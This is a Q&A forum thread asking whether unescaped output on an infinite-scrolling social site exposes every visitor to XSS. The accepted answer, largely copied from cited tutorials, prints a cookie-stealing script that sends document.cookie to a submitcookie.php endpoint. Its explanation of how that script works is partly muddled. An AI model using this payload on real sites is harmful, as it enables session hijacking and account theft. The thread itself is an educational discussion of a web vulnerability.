# XSS on infinite-scrolling pages

Tags: xss

Say I make a social-media website and forget to include the `htmlspecialchars()` function.
If the website uses infinite scrolling (that will eventually show every post on the website if you scroll down far enough), and somebody exploits the XSS, does everyone visiting the site get the XSS attack?

Comment: How does the answer you accepted answer your question about the "infinite scrolling" issue? The answer is just a primer on XSS.

Answer (score 1, accepted):

Let's start first by the three types of XSS

> **Reflected XSS**, where the malicious script comes from the current HTTP request.
>
> **Stored XSS**, where the malicious script comes from the website's database.
>
> **DOM-based XSS**, where the vulnerability exists in client-side code rather than server-side code.

[source](https://portswigger.net/web-security/cross-site-scripting)

> **Cookie Theft**
>
> Shopping preferences might not classify as sensitive information about
> an individual but online shopping carts and banking details are really
> sensitive data and all of this is also remembered by a site with the
> help of session cookies. If an attacker manages to get a hold of your
> session cookies then that person will be able to pose as you and that
> site and will have access to your banking details and your amazon
> shopping cart and might order stuff from your amazon account to
> his/her address spending all your money. This generally happens when
> the site has a vulnerability and the attacker uses something known as
> cross-site scripting (XSS) to exploit that vulnerability. This is
> found mostly in badly-coded websites where the developer forgets to
> include certain security measures to prevent an attacker from running
> a cross-site script.
>
> **How attacker use XSS to steal cookies?**
>
> I’m going to explain this with a hypothetical scenario. So lets say we
> visit one such vulnerable site which has a comments section on it. Now
> on an ideal, secure website a comment section should only have text in
> plain English but on an unsecure site, if we post a code in the
> comment section the site would think that it is some code from the
> server side and it is supposed to run that code
>
> ```
>     <script>     
> document.write('<img src="http://localhost/submitcookie.php? cookie ='
> + escape(document.cookie) + '" />);  </script>
> ```
>
> - This code when posted in the comments section will tick the browser    into thinking that it is Javascript code(due to the scripts tags)
>   sent by the server and will make it run it.
> - When some user visiting the site looks at the comment section he/she    will see a link to an image in the comments section which is actually    the result of the script running.
> - When a user clicks on this link thinking that it is an image (whereas    it actually is a php file) they get an image rendered in the comment    section.
>
> So to get back to your question, What the visitors of the website  don’t know is that this link silently executed a php file which grabs their cookie.
>
> Now, the cookie which has that users session ID is saved in the attacker's database and the attacker can pose as that user on that site.

[source](https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/)

So if you didn't take enough measures to protect your website from XSS attack, then Indeed your users will vulnerable subjects for the attacker

Comment: You copy/pasted this entire answer from other sources. You must attribute your sources, especially when copy/pasting so it doesn't look like it is your own words.

Comment: And I am really not sure how this answers the question or what it was accepted.